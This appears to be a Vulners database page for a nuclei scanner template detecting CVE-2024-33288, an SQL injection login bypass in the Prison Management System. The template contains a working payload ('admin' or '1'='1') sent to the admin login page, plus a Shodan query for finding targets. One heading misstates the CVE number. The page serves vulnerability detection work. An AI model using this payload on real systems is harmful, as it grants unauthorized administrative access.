Lucene search
K

Prison Management System - SQL Injection Authentication Bypass

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 51 Views

SQL Injection in Prison Management System - Authentication Bypass CVE-2024-3328

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Prison Management System - SQL Injection Authentication Bypass Vulnerability
13 May 202400:00
zdt
ATTACKERKB
CVE-2024-33288
8 May 202600:00
attackerkb
Circl
CVE-2024-33288
22 May 202417:35
circl
CNNVD
Prison Management System SQL注入漏洞
13 May 202400:00
cnnvd
CVE
CVE-2024-33288
8 May 202600:00
cve
Cvelist
CVE-2024-33288
8 May 202600:00
cvelist
Exploit DB
Prison Management System - SQL Injection Authentication Bypass
13 May 202400:00
exploitdb
EUVD
EUVD-2024-31033
8 May 202606:32
euvd
NVD
CVE-2024-33288
8 May 202606:16
nvd
Packet Storm
Prison Management System Using PHP SQL Injection
14 May 202400:00
packetstorm
Rows per page
id: CVE-2024-33288

info:
  name: Prison Management System - SQL Injection Authentication Bypass
  author: s4e-io
  severity: high
  description: |
    Sql injection vulnerability was found on the login page in Prison Management System
  impact: |
    Attackers can bypass authentication via SQL injection to gain unauthorized administrative access to the Prison Management System.
  remediation: |
    Apply security patches for Prison Management System addressing SQL injection vulnerabilities.
  reference:
    - https://en.0day.today/exploit/39610
    - https://www.sourcecodester.com/sql/17287/prison-management-system.html
  classification:
    cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: prison_management_system_project
    product: prison_management_system
    shodan-query: title:"Prison Management System"
  tags: cve,cve2024,cms,sqli,vuln

http:
  - raw:
      - |
        POST /Admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=
      - |
        GET /Admin/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<p>Change Password</p>"
          - "<p>Logout</p>"
          - "Admin Dashboard | Prison Management system"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d8fb4322139f3e88e6293d7f4de1344423344b2626f15e05e7d09f8f22eb1c04022100b17557c1a4680bbf82d9648833b25c00f7591c9e94ecfa146daf1788111af884:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.3
EPSS0.0081
SSVC
51